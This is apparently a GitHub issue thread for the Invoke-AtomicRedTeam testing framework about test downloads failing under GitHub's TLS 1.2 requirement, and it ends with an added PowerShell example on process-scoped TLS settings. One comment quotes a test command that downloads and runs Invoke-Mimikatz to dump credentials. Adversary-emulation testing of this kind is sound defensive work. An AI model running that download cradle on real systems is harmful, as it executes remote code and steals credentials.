Closed (cnotin closed 4 years ago)
We have the SchUseStrongCrypto registry key, which applies these settings to all .NET apps, but it's under HKLM so it requires admin and I don't think it's a prerequisite for Invoke-ART so that might not do the trick...
We've decided to address this by updating the atomics themselves (the yaml files within the other GitHub repo). This way the fix works for any/all execution frameworks. You will see several PRs from Scoubi adding the fix in over there. thx
It works too :)
@clr2of8, did he fix the issues? Because I'm going through the same issue now..
@WinterIsCommin which test in particular?
@cnotin Powershell - FileLess - T1059.001, test 1 & 3 for now.
Indeed it's missing the necessary code
@cnotin Fixed it by adding the following command before the web request. For example, file T1059.001.yaml:

executor:
  command: |
    powershell.exe "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" ; "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
That's the idea :) Actually this test could be modified to use the "powershell" executor instead of command_prompt to then call powershell.exe
You can submit a PR if you want
I added it in #30 for when Invoke-WebRequestVerifyHash is used, however many tests simply use Invoke-WebRequest from PowerShell to download their prereq files. GitHub on its github.com now requires TLS 1.2 which prevents download, for example:
I tried adding the following in the .psm1 file but it doesn't look to be sufficient:
Which is normal considering that it seems that a child powershell.exe is launched, so different context! I don't know the code very well so I don't know where we could best inject it to ensure it applies to most of the code :)
A short term solution could be using raw.githubusercontent.com links (which still accepts TLS 1.0 and 1.1) instead of https://github.com//Dumpert/raw... but let's do better ;)
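
The scoping behaviour discussed in this thread, as an added example that is not part of the original issue or of the project's code: it reads the machine-wide SchUseStrongCrypto value at the standard .NET Framework 4.x registry locations, adds TLS 1.2 to the current process only, and then shows that a child powershell.exe does not inherit that setting. The function names Get-StrongCryptoState and Enable-Tls12ForThisProcess are hypothetical.

```powershell
# Added example; function names are hypothetical, not from Invoke-AtomicRedTeam.

function Get-StrongCryptoState {
    # SchUseStrongCrypto is machine-wide (HKLM): reading needs no admin, setting does.
    $paths = @(
        'HKLM:\SOFTWARE\Microsoft\.NETFramework\v4.0.30319',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319'
    )
    foreach ($path in $paths) {
        $prop = Get-ItemProperty -Path $path -Name SchUseStrongCrypto -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Path               = $path
            SchUseStrongCrypto = if ($prop) { $prop.SchUseStrongCrypto } else { 'not set' }
        }
    }
}

function Enable-Tls12ForThisProcess {
    $current = [Net.ServicePointManager]::SecurityProtocol
    $tls12   = [Net.SecurityProtocolType]::Tls12
    # A value of 0 (SystemDefault on newer .NET) defers to the OS, so leave it alone.
    # Otherwise add TLS 1.2 with -bor so protocols already enabled are not dropped.
    if ([int]$current -ne 0 -and -not ([int]$current -band [int]$tls12)) {
        [Net.ServicePointManager]::SecurityProtocol = $current -bor $tls12
    }
    [Net.ServicePointManager]::SecurityProtocol
}

Get-StrongCryptoState | Format-Table -AutoSize

"Parent before: $([Net.ServicePointManager]::SecurityProtocol)"
"Parent after : $(Enable-Tls12ForThisProcess)"

# ServicePointManager state lives in the process, so a child powershell.exe
# starts from the machine default again. This is why a setting made in the
# module (.psm1) does not reach a test that spawns its own powershell.exe.
$child = powershell.exe -NoProfile -Command '[Net.ServicePointManager]::SecurityProtocol'
"Child        : $child"
```

If the child line lacks Tls12 while the parent shows it, the setting has to be made inside the spawned command itself or machine-wide through the registry value.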